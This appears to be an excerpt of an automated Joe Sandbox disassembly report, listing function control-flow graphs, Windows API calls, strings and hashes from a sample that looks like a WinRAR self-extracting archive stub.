                                                          control_flow_graph 1030 fba69b-fba6bf call fcec50 1033 fba6c1-fba6ce FindFirstFileW 1030->1033 1034 fba727-fba730 FindNextFileW 1030->1034 1035 fba742-fba7ff call fc0602 call fbc310 call fc15da * 3 1033->1035 1036 fba6d0-fba6e2 call fbbb03 1033->1036 1034->1035 1037 fba732-fba740 GetLastError 1034->1037 1042 fba804-fba811 1035->1042 1044 fba6fe-fba707 GetLastError 1036->1044 1045 fba6e4-fba6fc FindFirstFileW 1036->1045 1039 fba719-fba722 1037->1039 1039->1042 1048 fba709-fba70c 1044->1048 1049 fba717 1044->1049 1045->1035 1045->1044 1048->1049 1051 fba70e-fba711 1048->1051 1049->1039 1051->1049 1053 fba713-fba715 1051->1053 1053->1039
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6C4
                                                            • Part of subcall function 00FBBB03: _wcslen.LIBCMT ref: 00FBBB27
                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6F2
                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA6FE
                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA728
                                                          • GetLastError.KERNEL32(?,?,?,?,00FBA592,000000FF,?,?), ref: 00FBA734
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                          • String ID:
                                                          • API String ID: 42610566-0
                                                          • Opcode ID: 7bd8059106c1e2abdf3ada2d1ae43c3ecf891dc8eda8c4ae874c72b7d1164350
                                                          • Instruction ID: 750d15dd2698ef7ff1165c9a22d5b27e10e012c78fe74deb2a904d018699b9eb
                                                          • Opcode Fuzzy Hash: 7bd8059106c1e2abdf3ada2d1ae43c3ecf891dc8eda8c4ae874c72b7d1164350
                                                          • Instruction Fuzzy Hash: C0419F72900159ABCB25DF64CCC8BEAB7B8FB48350F14419AE55DE3200DB34AE90EF90
                                                          Function 00FD7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002,00000000), ref: 00FD7E0F
                                                          • TerminateProcess.KERNEL32(00000000,?,00FD7DC4,00000000,00FEC300,0000000C,00FD7F1B,00000000,00000002,00000000), ref: 00FD7E16
                                                          • ExitProcess.KERNEL32 ref: 00FD7E28
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: b26ca58dd1664915391a5deb161e0c5a8a393020706abf517facc3423bb523bd
                                                          • Instruction ID: 952e33e8091cb9b11e0ceb42f32b6db9027e65671fa9c27b8f18b1f886835600
                                                          • Opcode Fuzzy Hash: b26ca58dd1664915391a5deb161e0c5a8a393020706abf517facc3423bb523bd
                                                          • Instruction Fuzzy Hash: E0E04632400288EBCF01BF20CD4DA4A3F6BEB40351B084456F9098F232DB3ADE52FA80
                                                          Function 00FB848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 7d0ba20dd68a6dd6f642e6520ebf959a48a4766a364a54e7d0a6b6ade06bce3a
                                                          • Instruction ID: 427346971a789ac8199c2554f1bf024dbcd8267975525b14fa06e90fb9fd5a6a
                                                          • Opcode Fuzzy Hash: 7d0ba20dd68a6dd6f642e6520ebf959a48a4766a364a54e7d0a6b6ade06bce3a
                                                          • Instruction Fuzzy Hash: A2824B70D04245AEDF25DF65C881BFABBBDBF45350F0841B9D8499B242CB345A8AEF60
                                                          Function 00FCB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FCB7E5
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCB8D1
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FCB8EF
                                                          • IsDialogMessageW.USER32(?,?), ref: 00FCB902
                                                          • TranslateMessage.USER32(?), ref: 00FCB910
                                                          • DispatchMessageW.USER32(?), ref: 00FCB91A
                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00FCB93D
                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00FCB960
                                                          • GetDlgItem.USER32(?,00000068), ref: 00FCB983
                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FCB99E
                                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FE35F4), ref: 00FCB9B1
                                                            • Part of subcall function 00FCD453: _wcslen.LIBCMT ref: 00FCD47D
                                                          • SetFocus.USER32(00000000), ref: 00FCB9B8
                                                          • _swprintf.LIBCMT ref: 00FCBA24
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                            • Part of subcall function 00FCD4D4: GetDlgItem.USER32(00000068,0100FCB8), ref: 00FCD4E8
                                                            • Part of subcall function 00FCD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00FCAF07,00000001,?,?,00FCB7B9,00FE506C,0100FCB8,0100FCB8,00001000,00000000,00000000), ref: 00FCD510
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00FCD51B
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FE35F4), ref: 00FCD529
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD53F
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00FCD559
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD59D
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00FCD5AB
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00FCD5BA
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00FCD5E1
                                                            • Part of subcall function 00FCD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00FE43F4), ref: 00FCD5F0
                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00FCBA68
                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00FCBA90
                                                          • GetTickCount.KERNEL32 ref: 00FCBAAE
                                                          • _swprintf.LIBCMT ref: 00FCBAC2
                                                          • GetLastError.KERNEL32(?,00000011), ref: 00FCBAF4
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00FCBB43
                                                          • _swprintf.LIBCMT ref: 00FCBB7C
                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00FCBBD0
                                                          • GetCommandLineW.KERNEL32 ref: 00FCBBEA
                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00FCBC47
                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00FCBC6F
                                                          • Sleep.KERNEL32(00000064), ref: 00FCBCB9
                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00FCBCE2
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FCBCEB
                                                          • _swprintf.LIBCMT ref: 00FCBD1E
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCBD7D
                                                          • SetDlgItemTextW.USER32(?,00000065,00FE35F4), ref: 00FCBD94
                                                          • GetDlgItem.USER32(?,00000065), ref: 00FCBD9D
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00FCBDAC
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00FCBDBB
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCBE68
                                                          • _wcslen.LIBCMT ref: 00FCBEBE
                                                          • _swprintf.LIBCMT ref: 00FCBEE8
                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FCBF32
                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00FCBF4C
                                                          • GetDlgItem.USER32(?,00000068), ref: 00FCBF55
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00FCBF6B
                                                          • GetDlgItem.USER32(?,00000066), ref: 00FCBF85
                                                          • SetWindowTextW.USER32(00000000,00FFA472), ref: 00FCBFA7
                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00FCC007
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCC01A
                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00FCC0BD
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00FCC197
                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00FCC1D9
                                                            • Part of subcall function 00FCC73F: __EH_prolog.LIBCMT ref: 00FCC744
                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00FCC1FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                          • API String ID: 3445078344-2238251102
                                                          • Opcode ID: b35d3aaf49637632669d61066166669d05c8ce87f8e6d04ba08802f91065f06a
                                                          • Instruction ID: 8e6bfcafd18af3e99998dc738a8015324fb79f535b161f283ff506b87f6eb6e5
                                                          • Opcode Fuzzy Hash: b35d3aaf49637632669d61066166669d05c8ce87f8e6d04ba08802f91065f06a
                                                          • Instruction Fuzzy Hash: B742E571D4424ABAEB31DBB09E4BFBE376CAB01750F040059F684AA0D2CB7D5945FB62
                                                          Function 00FC0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 268 fc0863-fc0886 call fcec50 GetModuleHandleW 271 fc0888-fc089f GetProcAddress 268->271 272 fc08e7-fc0b48 268->272 273 fc08b9-fc08c9 GetProcAddress 271->273 274 fc08a1-fc08b7 271->274 275 fc0b4e-fc0b59 call fd75fb 272->275 276 fc0c14-fc0c40 GetModuleFileNameW call fbc29a call fc0602 272->276 277 fc08cb-fc08e0 273->277 278 fc08e5 273->278 274->273 275->276 286 fc0b5f-fc0b8d GetModuleFileNameW CreateFileW 275->286 292 fc0c42-fc0c4e call fbb146 276->292 277->278 278->272 287 fc0b8f-fc0b9b SetFilePointer 286->287 288 fc0c08-fc0c0f CloseHandle 286->288 287->288 290 fc0b9d-fc0bb9 ReadFile 287->290 288->276 290->288 294 fc0bbb-fc0be0 290->294 297 fc0c7d-fc0ca4 call fbc310 GetFileAttributesW 292->297 298 fc0c50-fc0c5b call fc081b 292->298 296 fc0bfd-fc0c06 call fc0371 294->296 296->288 305 fc0be2-fc0bfc call fc081b 296->305 308 fc0cae 297->308 309 fc0ca6-fc0caa 297->309 298->297 307 fc0c5d-fc0c7b CompareStringW 298->307 305->296 307->297 307->309 312 fc0cb0-fc0cb5 308->312 309->292 311 fc0cac 309->311 311->312 313 fc0cec-fc0cee 312->313 314 fc0cb7 312->314 315 fc0dfb-fc0e05 313->315 316 fc0cf4-fc0d0b call fbc2e4 call fbb146 313->316 317 fc0cb9-fc0ce0 call fbc310 GetFileAttributesW 314->317 327 fc0d0d-fc0d6e call fc081b * 2 call fbe617 call fb4092 call fbe617 call fca7e4 316->327 328 fc0d73-fc0da6 call fb4092 AllocConsole 316->328 322 fc0cea 317->322 323 fc0ce2-fc0ce6 317->323 322->313 323->317 325 fc0ce8 323->325 325->313 334 fc0df3-fc0df5 ExitProcess 327->334 333 fc0da8-fc0ded GetCurrentProcessId AttachConsole call fd3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00FC087C
                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FC088E
                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FC08BF
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FC0B69
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FC0B83
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FC0B93
                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00FE3C7C,00000000), ref: 00FC0BB1
                                                          • CloseHandle.KERNEL32(00000000), ref: 00FC0C09
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FC0C1E
                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00FE3C7C,?,00000000,?,00000800), ref: 00FC0C72
                                                          • GetFileAttributesW.KERNELBASE(?,?,00FE3C7C,00000800,?,00000000,?,00000800), ref: 00FC0C9C
                                                          • GetFileAttributesW.KERNEL32(?,?,00FE3D44,00000800), ref: 00FC0CD8
                                                            • Part of subcall function 00FC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FC0836
                                                            • Part of subcall function 00FC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00FBF2D8,Crypt32.dll,00000000,00FBF35C,?,?,00FBF33E,?,?,?), ref: 00FC0858
                                                          • _swprintf.LIBCMT ref: 00FC0D4A
                                                          • _swprintf.LIBCMT ref: 00FC0D96
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • AllocConsole.KERNEL32 ref: 00FC0D9E
                                                          • GetCurrentProcessId.KERNEL32 ref: 00FC0DA8
                                                          • AttachConsole.KERNEL32(00000000), ref: 00FC0DAF
                                                          • _wcslen.LIBCMT ref: 00FC0DC4
                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FC0DD5
                                                          • WriteConsoleW.KERNEL32(00000000), ref: 00FC0DDC
                                                          • Sleep.KERNEL32(00002710), ref: 00FC0DE7
                                                          • FreeConsole.KERNEL32 ref: 00FC0DED
                                                          • ExitProcess.KERNEL32 ref: 00FC0DF5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                          • API String ID: 1207345701-3298887752
                                                          • Opcode ID: 89c1b7feff7d3524f7f151fed437256c43835947c1fdd8b8d0b9dc9b44e106ea
                                                          • Instruction ID: fd9f1be30215c28df0f06d99b15c5812cc4ab63408673a96b75748dc91989ebf
                                                          • Opcode Fuzzy Hash: 89c1b7feff7d3524f7f151fed437256c43835947c1fdd8b8d0b9dc9b44e106ea
                                                          • Instruction Fuzzy Hash: 8DD1B1B14083C5ABC731DF528D8DF9FBAE8AB84708F10491DF2859B151CBB49649EB92
                                                          Function 00FCC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 347 fcc73f-fcc757 call fceb78 call fcec50 352 fcd40d-fcd418 347->352 353 fcc75d-fcc787 call fcb314 347->353 353->352 356 fcc78d-fcc792 353->356 357 fcc793-fcc7a1 356->357 358 fcc7a2-fcc7b7 call fcaf98 357->358 361 fcc7b9 358->361 362 fcc7bb-fcc7d0 call fc1fbb 361->362 365 fcc7dd-fcc7e0 362->365 366 fcc7d2-fcc7d6 362->366 368 fcd3d9-fcd404 call fcb314 365->368 369 fcc7e6 365->369 366->362 367 fcc7d8 366->367 367->368 368->357 381 fcd40a-fcd40c 368->381 371 fcca7c-fcca7e 369->371 372 fcc7ed-fcc7f0 369->372 373 fcc9be-fcc9c0 369->373 374 fcca5f-fcca61 369->374 371->368 375 fcca84-fcca8b 371->375 372->368 378 fcc7f6-fcc850 call fca64d call fbbdf3 call fba544 call fba67e call fb6edb 372->378 373->368 377 fcc9c6-fcc9d2 373->377 374->368 379 fcca67-fcca77 SetWindowTextW 374->379 375->368 380 fcca91-fccaaa 375->380 382 fcc9d4-fcc9e5 call fd7686 377->382 383 fcc9e6-fcc9eb 377->383 438 fcc98f-fcc9a4 call fba5d1 378->438 379->368 385 fccaac 380->385 386 fccab2-fccac0 call fd3e13 380->386 381->352 382->383 389 fcc9ed-fcc9f3 383->389 390 fcc9f5-fcca00 call fcb48e 383->390 385->386 386->368 402 fccac6-fccacf 386->402 394 fcca05-fcca07 389->394 390->394 399 fcca09-fcca10 call fd3e13 394->399 400 fcca12-fcca32 call fd3e13 call fd3e3e 394->400 399->400 421 fcca4b-fcca4d 400->421 422 fcca34-fcca3b 400->422 406 fccaf8-fccafb 402->406 407 fccad1-fccad5 402->407 412 fccb01-fccb04 406->412 414 fccbe0-fccbee call fc0602 406->414 411 fccad7-fccadf 407->411 407->412 411->368 417 fccae5-fccaf3 call fc0602 411->417 419 fccb06-fccb0b 412->419 420 fccb11-fccb2c 412->420 430 fccbf0-fccc04 call fd279b 414->430 417->430 419->414 419->420 433 fccb2e-fccb68 420->433 434 fccb76-fccb7d 420->434 421->368 429 fcca53-fcca5a call fd3e2e 421->429 427 fcca3d-fcca3f 422->427 428 fcca42-fcca4a call fd7686 422->428 427->428 428->421 429->368 448 fccc06-fccc0a 430->448 449 fccc11-fccc62 call fc0602 call fcb1be GetDlgItem SetWindowTextW SendMessageW call fd3e49 430->449 469 fccb6c-fccb6e 433->469 470 fccb6a 433->470 440 fccb7f-fccb97 call fd3e13 434->440 441 fccbab-fccbce call fd3e13 * 2 434->441 455 fcc9aa-fcc9b9 call fba55a 438->455 456 fcc855-fcc869 SetFileAttributesW 438->456 440->441 463 fccb99-fccba6 call fc05da 440->463 441->430 475 fccbd0-fccbde call fc05da 441->475 448->449 454 fccc0c-fccc0e 448->454 481 fccc67-fccc6b 449->481 454->449 455->368 458 fcc90f-fcc91f GetFileAttributesW 456->458 459 fcc86f-fcc8a2 call fbb991 call fbb690 call fd3e13 456->459 458->438 467 fcc921-fcc930 DeleteFileW 458->467 490 fcc8a4-fcc8b3 call fd3e13 459->490 491 fcc8b5-fcc8c3 call fbbdb4 459->491 463->441 467->438 474 fcc932-fcc935 467->474 469->434 470->469 478 fcc939-fcc965 call fb4092 GetFileAttributesW 474->478 475->430 488 fcc937-fcc938 478->488 489 fcc967-fcc97d MoveFileW 478->489 481->368 485 fccc71-fccc85 SendMessageW 481->485 485->368 488->478 489->438 492 fcc97f-fcc989 MoveFileExW 489->492 490->491 497 fcc8c9-fcc908 call fd3e13 call fcfff0 490->497 491->455 491->497 492->438 497->458
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FCC744
                                                            • Part of subcall function 00FCB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00FCB3FB
                                                          • _wcslen.LIBCMT ref: 00FCCA0A
                                                          • _wcslen.LIBCMT ref: 00FCCA13
                                                          • SetWindowTextW.USER32(?,?), ref: 00FCCA71
                                                          • _wcslen.LIBCMT ref: 00FCCAB3
                                                          • _wcsrchr.LIBVCRUNTIME ref: 00FCCBFB
                                                          • GetDlgItem.USER32(?,00000066), ref: 00FCCC36
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00FCCC46
                                                          • SendMessageW.USER32(00000000,00000143,00000000,00FFA472), ref: 00FCCC54
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00FCCC7F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                          • API String ID: 2804936435-312220925
                                                          • Opcode ID: 26ae58ee90ecc5f720d883c9604b94a312366226a8f726728c53cd8b17267dfa
                                                          • Instruction ID: 0268f57776b3832bcc6a4acf6bd4f4b5357ba4c45e413882c5c9bf092b137e04
                                                          • Opcode Fuzzy Hash: 26ae58ee90ecc5f720d883c9604b94a312366226a8f726728c53cd8b17267dfa
                                                          • Instruction Fuzzy Hash: BFE16872D00159AADF25DBA0DD86FEE77BCAF04350F0440AAF649E7040EB789E44AF61
                                                          Function 00FBDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FBDA70
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FBDAAC
                                                            • Part of subcall function 00FBC29A: _wcslen.LIBCMT ref: 00FBC2A2
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                            • Part of subcall function 00FC1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00FBBAE9,00000000,?,?,?,00010444), ref: 00FC1BA0
                                                          • _wcslen.LIBCMT ref: 00FBDDE9
                                                          • __fprintf_l.LIBCMT ref: 00FBDF1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                          • API String ID: 566448164-801612888
                                                          • Opcode ID: c0da96ebbe5a404e6ee67509ccbc4f16c31ea124788217b9b898180d744fc950
                                                          • Instruction ID: 238c76662c8581318ff3fd88215cd3c0228fd3bba8876438fbf2b849ce891fa6
                                                          • Opcode Fuzzy Hash: c0da96ebbe5a404e6ee67509ccbc4f16c31ea124788217b9b898180d744fc950
